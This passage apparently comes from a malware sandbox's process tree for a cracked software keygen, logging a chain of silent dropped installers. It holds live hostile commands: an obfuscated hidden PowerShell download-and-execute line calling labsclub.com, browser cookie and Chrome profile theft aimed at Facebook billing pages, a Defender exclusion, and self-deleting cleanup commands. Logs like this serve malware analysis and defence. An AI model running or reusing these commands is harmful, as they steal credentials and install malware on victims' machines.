C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:10868

C:\Users\Admin\AppData\Local\Temp\e0k1oxy24gv\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\e0k1oxy24gv\askinstall24.exe"
8⤵
PID:10420

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:5264

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:12508

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
9⤵
PID:12492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
9⤵
PID:19708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x268608c6e00,0x268608c6e10,0x268608c6e20
10⤵
PID:17836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,15985119949375104042,9883917335007678549,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1616 /prefetch:8
10⤵
PID:13464

C:\Users\Admin\AppData\Local\Temp\qlezy2i4zcx\vict.exe
"C:\Users\Admin\AppData\Local\Temp\qlezy2i4zcx\vict.exe" /VERYSILENT /id=535
8⤵
PID:9804

C:\Users\Admin\AppData\Local\Temp\is-I3CHJ.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I3CHJ.tmp\vict.tmp" /SL5="$40650,870426,780800,C:\Users\Admin\AppData\Local\Temp\qlezy2i4zcx\vict.exe" /VERYSILENT /id=535
9⤵
PID:11840

C:\Users\Admin\AppData\Local\Temp\is-HOATK.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-HOATK.tmp\wimapi.exe" 535
10⤵
PID:12384

C:\Users\Admin\AppData\Local\Temp\h3jlfdpce2q\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\h3jlfdpce2q\chashepro3.exe" /VERYSILENT
8⤵
PID:11528

C:\Users\Admin\AppData\Local\Temp\is-PBJQ8.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PBJQ8.tmp\chashepro3.tmp" /SL5="$50706,1478410,58368,C:\Users\Admin\AppData\Local\Temp\h3jlfdpce2q\chashepro3.exe" /VERYSILENT
9⤵
PID:7876

C:\Users\Admin\AppData\Local\Temp\mcynn5zzeac\riwprlglitd.exe
"C:\Users\Admin\AppData\Local\Temp\mcynn5zzeac\riwprlglitd.exe" /ustwo INSTALL
8⤵
PID:10596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "riwprlglitd.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mcynn5zzeac\riwprlglitd.exe" & exit
9⤵
PID:14284

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "riwprlglitd.exe" /f
10⤵
- Kills process with taskkill
PID:14372

C:\Users\Admin\AppData\Local\Temp\pydsgtrmmsz\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\pydsgtrmmsz\askinstall24.exe"
8⤵
PID:14396

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:16572

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:18328

C:\Users\Admin\AppData\Local\Temp\a1sjarhdify\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\a1sjarhdify\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:19672

C:\Users\Admin\AppData\Local\Temp\is-7V749.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7V749.tmp\Setup3310.tmp" /SL5="$80CA0,802346,56832,C:\Users\Admin\AppData\Local\Temp\a1sjarhdify\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:18768

C:\Users\Admin\AppData\Local\Temp\3b2vzzaotwz\vict.exe
"C:\Users\Admin\AppData\Local\Temp\3b2vzzaotwz\vict.exe" /VERYSILENT /id=535
8⤵
PID:8784

C:\Users\Admin\AppData\Local\Temp\is-52ASD.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-52ASD.tmp\vict.tmp" /SL5="$1504A2,870426,780800,C:\Users\Admin\AppData\Local\Temp\3b2vzzaotwz\vict.exe" /VERYSILENT /id=535
9⤵
PID:13028

C:\Users\Admin\AppData\Local\Temp\is-OQ2PG.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-OQ2PG.tmp\wimapi.exe" 535
10⤵
PID:20228

C:\Users\Admin\AppData\Local\Temp\xyhmaaeyhib\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\xyhmaaeyhib\chashepro3.exe" /VERYSILENT
8⤵
PID:20164

C:\Users\Admin\AppData\Local\Temp\is-J8CV9.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J8CV9.tmp\chashepro3.tmp" /SL5="$10DDE,1478410,58368,C:\Users\Admin\AppData\Local\Temp\xyhmaaeyhib\chashepro3.exe" /VERYSILENT
9⤵
PID:15940

C:\Users\Admin\AppData\Local\Temp\rnuazbwi4zc\ydzkkplubip.exe
"C:\Users\Admin\AppData\Local\Temp\rnuazbwi4zc\ydzkkplubip.exe" /ustwo INSTALL
8⤵
PID:11884

C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1948

C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1408

C:\Users\Admin\AppData\Roaming\B878.tmp.exe
"C:\Users\Admin\AppData\Roaming\B878.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3868

C:\Users\Admin\AppData\Roaming\B878.tmp.exe
"C:\Users\Admin\AppData\Roaming\B878.tmp.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2360

C:\Users\Admin\AppData\Roaming\BBB5.tmp.exe
"C:\Users\Admin\AppData\Roaming\BBB5.tmp.exe"
5⤵
- Executes dropped EXE
PID:1848

C:\Users\Admin\AppData\Roaming\BBB5.tmp.exe
"{path}"
6⤵
PID:5484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
5⤵
PID:6556

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:5308

C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
4⤵
PID:2448

C:\ProgramData\279438.3
"C:\ProgramData\279438.3"
5⤵
PID:7764

C:\ProgramData\3664053.40
"C:\ProgramData\3664053.40"
5⤵
PID:7788

C:\ProgramData\122979.1
"C:\ProgramData\122979.1"
5⤵
PID:7880

C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
4⤵
PID:8008

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:7588

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:6924

C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
"C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"
1⤵
- Executes dropped EXE
PID:1692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "
2⤵
PID:3324

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:4428

C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4640

C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:3608

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:2164

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:4404

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"
4⤵
PID:748

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4732

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:1564

C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2088

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:4936

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
5⤵
PID:2804

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:3684

C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
4⤵
- Executes dropped EXE
PID:3872

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:2248

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:3620

C:\Users\Admin\AppData\Local\Temp\RarSFX4\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Install.exe"
4⤵
PID:5096

C:\Users\Admin\AppData\Local\Temp\RW9FSGIDUG\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RW9FSGIDUG\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
PID:2240

C:\Users\Admin\AppData\Local\Temp\RW9FSGIDUG\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RW9FSGIDUG\multitimer.exe" 1 3.1615302020.60478d84ee057 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4132

C:\Users\Admin\AppData\Local\Temp\RW9FSGIDUG\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RW9FSGIDUG\multitimer.exe" 2 3.1615302020.60478d84ee057
7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
PID:4576

C:\Users\Admin\AppData\Local\Temp\rj4m3qge2xx\db0pjl1itxm.exe
"C:\Users\Admin\AppData\Local\Temp\rj4m3qge2xx\db0pjl1itxm.exe" /VERYSILENT
8⤵
PID:492

C:\Users\Admin\AppData\Local\Temp\is-3REGK.tmp\db0pjl1itxm.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3REGK.tmp\db0pjl1itxm.tmp" /SL5="$204C8,870426,780800,C:\Users\Admin\AppData\Local\Temp\rj4m3qge2xx\db0pjl1itxm.exe" /VERYSILENT
9⤵
- Loads dropped DLL
PID:1536

C:\Users\Admin\AppData\Local\Temp\is-0709N.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-0709N.tmp\winlthst.exe" test1 test1
10⤵
PID:7004

C:\Users\Admin\AppData\Local\Temp\3q5k1SABY.exe
"C:\Users\Admin\AppData\Local\Temp\3q5k1SABY.exe"
11⤵
PID:19516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
12⤵
PID:19852

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\daoqr2bb\daoqr2bb.cmdline"
13⤵
PID:16524

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFE6.tmp" "c:\Users\Admin\AppData\Local\Temp\daoqr2bb\CSC3BB3886DB464DE38B638F2B41B8BB4.TMP"
14⤵
PID:4088

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3hhfrg3d\3hhfrg3d.cmdline"
13⤵
PID:12924

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB4F.tmp" "c:\Users\Admin\AppData\Local\Temp\3hhfrg3d\CSC48032078569B4059977CFCCDC4342F2F.TMP"
14⤵
PID:18920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
13⤵
PID:10348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
13⤵
PID:10840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
13⤵
PID:9736

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:8656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
PID:11900

C:\Users\Admin\AppData\Local\Temp\h2adyo2ps2u\vict.exe
"C:\Users\Admin\AppData\Local\Temp\h2adyo2ps2u\vict.exe" /VERYSILENT /id=535
8⤵
PID:360

C:\Users\Admin\AppData\Local\Temp\is-AJ75U.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AJ75U.tmp\vict.tmp" /SL5="$304B6,870426,780800,C:\Users\Admin\AppData\Local\Temp\h2adyo2ps2u\vict.exe" /VERYSILENT /id=535
9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5096

C:\Users\Admin\AppData\Local\Temp\is-A6LMU.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-A6LMU.tmp\wimapi.exe" 535
10⤵
PID:7028

C:\Users\Admin\AppData\Local\Temp\sxiqdkc0amv\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\sxiqdkc0amv\askinstall24.exe"
8⤵
PID:5068

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:6888

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:6320

C:\Users\Admin\AppData\Local\Temp\smghgwlxafk\hkrb4cn21ds.exe
"C:\Users\Admin\AppData\Local\Temp\smghgwlxafk\hkrb4cn21ds.exe" testparams
8⤵
PID:3968

C:\Users\Admin\AppData\Roaming\uynyqxugj24\e00avmzgg5t.exe
"C:\Users\Admin\AppData\Roaming\uynyqxugj24\e00avmzgg5t.exe" /VERYSILENT /p=testparams
9⤵
PID:5480

C:\Users\Admin\AppData\Local\Temp\is-5S5RI.tmp\e00avmzgg5t.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5S5RI.tmp\e00avmzgg5t.tmp" /SL5="$5011E,552809,216064,C:\Users\Admin\AppData\Roaming\uynyqxugj24\e00avmzgg5t.exe" /VERYSILENT /p=testparams
10⤵
PID:512

C:\Users\Admin\AppData\Local\Temp\0zyydqmbwz0\k1bydixpomz.exe
"C:\Users\Admin\AppData\Local\Temp\0zyydqmbwz0\k1bydixpomz.exe" /ustwo INSTALL
8⤵
PID:5328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "k1bydixpomz.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\0zyydqmbwz0\k1bydixpomz.exe" & exit
9⤵
PID:7548

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "k1bydixpomz.exe" /f
10⤵
- Kills process with taskkill
PID:7580

C:\Users\Admin\AppData\Local\Temp\jkf1mkppnj3\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\jkf1mkppnj3\chashepro3.exe" /VERYSILENT
8⤵
PID:5616

C:\Users\Admin\AppData\Local\Temp\is-JN53D.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JN53D.tmp\chashepro3.tmp" /SL5="$30502,1478410,58368,C:\Users\Admin\AppData\Local\Temp\jkf1mkppnj3\chashepro3.exe" /VERYSILENT
9⤵
- Drops file in Program Files directory
PID:6204

C:\Users\Admin\AppData\Local\Temp\gxjz1necbfl\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\gxjz1necbfl\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:5500

C:\Users\Admin\AppData\Local\Temp\is-VI5ED.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VI5ED.tmp\Setup3310.tmp" /SL5="$30500,802346,56832,C:\Users\Admin\AppData\Local\Temp\gxjz1necbfl\Setup3310.exe" /Verysilent /subid=577
9⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:6168

C:\Users\Admin\AppData\Local\Temp\is-RV4LQ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-RV4LQ.tmp\Setup.exe" /Verysilent
10⤵
PID:4660

C:\Users\Admin\AppData\Local\Temp\is-3F2JE.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3F2JE.tmp\Setup.tmp" /SL5="$107B0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-RV4LQ.tmp\Setup.exe" /Verysilent
11⤵
PID:6760

C:\Users\Admin\AppData\Local\Temp\is-EO8EE.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-EO8EE.tmp\PictureLAb.exe" /Verysilent
12⤵
PID:5920

C:\Users\Admin\AppData\Local\Temp\is-BGR10.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BGR10.tmp\PictureLAb.tmp" /SL5="$20810,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-EO8EE.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:5320

C:\Users\Admin\AppData\Local\Temp\is-GC1QF.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-GC1QF.tmp\Setup.exe" /VERYSILENT
14⤵
PID:5668

C:\Users\Admin\AppData\Local\Temp\is-EO8EE.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-EO8EE.tmp\Delta.exe" /Verysilent
12⤵
PID:7584

C:\Users\Admin\AppData\Local\Temp\is-TFPO4.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TFPO4.tmp\Delta.tmp" /SL5="$30526,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-EO8EE.tmp\Delta.exe" /Verysilent
13⤵
PID:6436

C:\Users\Admin\AppData\Local\Temp\is-VDB0N.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-VDB0N.tmp\Setup.exe" /VERYSILENT
14⤵
PID:6744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-VDB0N.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
15⤵
PID:2528

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
16⤵
- Kills process with taskkill
PID:6128

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
16⤵
- Delays execution with timeout.exe
PID:7044

C:\Users\Admin\AppData\Local\Temp\is-EO8EE.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-EO8EE.tmp\zznote.exe" /Verysilent
12⤵
PID:5240

C:\Users\Admin\AppData\Local\Temp\is-4OCIJ.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4OCIJ.tmp\zznote.tmp" /SL5="$40678,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-EO8EE.tmp\zznote.exe" /Verysilent
13⤵
PID:7224

C:\Users\Admin\AppData\Local\Temp\is-L09UQ.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-L09UQ.tmp\jg4_4jaa.exe" /silent
14⤵
PID:6684

C:\Users\Admin\AppData\Local\Temp\is-EO8EE.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-EO8EE.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:6700

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:6264

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:5496

C:\Users\Admin\AppData\Local\Temp\gj3epexrbqr\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\gj3epexrbqr\vpn.exe" /silent /subid=482
8⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\is-9RLU8.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9RLU8.tmp\vpn.tmp" /SL5="$30510,15170975,270336,C:\Users\Admin\AppData\Local\Temp\gj3epexrbqr\vpn.exe" /silent /subid=482
9⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\w5jpmwjqd0e\d125nifb3na.exe
"C:\Users\Admin\AppData\Local\Temp\w5jpmwjqd0e\d125nifb3na.exe" 57a764d042bf8
8⤵
PID:6096

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\GXY5TGGI58\VP6PG16HX.exe" 57a764d042bf8 & exit
9⤵
PID:5296

C:\Program Files\GXY5TGGI58\VP6PG16HX.exe
"C:\Program Files\GXY5TGGI58\VP6PG16HX.exe" 57a764d042bf8
10⤵
PID:8060

C:\Users\Admin\AppData\Local\Temp\1tfh0phjwzo\app.exe
"C:\Users\Admin\AppData\Local\Temp\1tfh0phjwzo\app.exe" /8-23
8⤵
PID:6160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Falling-Lake"
9⤵
PID:2504

C:\Program Files (x86)\Falling-Lake\7za.exe
"C:\Program Files (x86)\Falling-Lake\7za.exe" e -p154.61.71.51 winamp-plugins.7z
9⤵
PID:8108

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Falling-Lake\app.exe" -map "C:\Program Files (x86)\Falling-Lake\WinmonProcessMonitor.sys""
9⤵
PID:5148

C:\Program Files (x86)\Falling-Lake\app.exe
"C:\Program Files (x86)\Falling-Lake\app.exe" -map "C:\Program Files (x86)\Falling-Lake\WinmonProcessMonitor.sys"
10⤵
PID:5188

C:\Program Files (x86)\Falling-Lake\7za.exe
"C:\Program Files (x86)\Falling-Lake\7za.exe" e -p154.61.71.51 winamp.7z
9⤵
PID:7848

C:\Program Files (x86)\Falling-Lake\app.exe
"C:\Program Files (x86)\Falling-Lake\app.exe" /8-23
9⤵
PID:6920

C:\Program Files (x86)\Falling-Lake\app.exe
"C:\Program Files (x86)\Falling-Lake\app.exe" /8-23
10⤵
PID:5272

C:\Users\Admin\AppData\Local\Temp\3uxk2vbaarq\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\3uxk2vbaarq\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
PID:6432

C:\Users\Admin\AppData\Local\Temp\is-DNETT.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DNETT.tmp\IBInstaller_97039.tmp" /SL5="$20742,14441882,721408,C:\Users\Admin\AppData\Local\Temp\3uxk2vbaarq\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
PID:6648

C:\Users\Admin\AppData\Local\Temp\is-K0H27.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-K0H27.tmp\{app}\chrome_proxy.exe"
10⤵
PID:6960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-K0H27.tmp\{app}\chrome_proxy.exe"
11⤵
PID:8160

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
10⤵
PID:6948

C:\Users\Admin\AppData\Local\Temp\saizhn02a3t\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\saizhn02a3t\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:10580

C:\Users\Admin\AppData\Local\Temp\is-FML7U.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FML7U.tmp\Setup3310.tmp" /SL5="$30726,802346,56832,C:\Users\Admin\AppData\Local\Temp\saizhn02a3t\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:11636

C:\Users\Admin\AppData\Local\Temp\is-QSN35.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QSN35.tmp\Setup.exe" /Verysilent
10⤵
PID:13084

C:\Users\Admin\AppData\Local\Temp\is-G3GQC.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G3GQC.tmp\Setup.tmp" /SL5="$20936,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-QSN35.tmp\Setup.exe" /Verysilent
11⤵
PID:13276

C:\Users\Admin\AppData\Local\Temp\is-JOQ3D.tmp\PictureLAb.exe
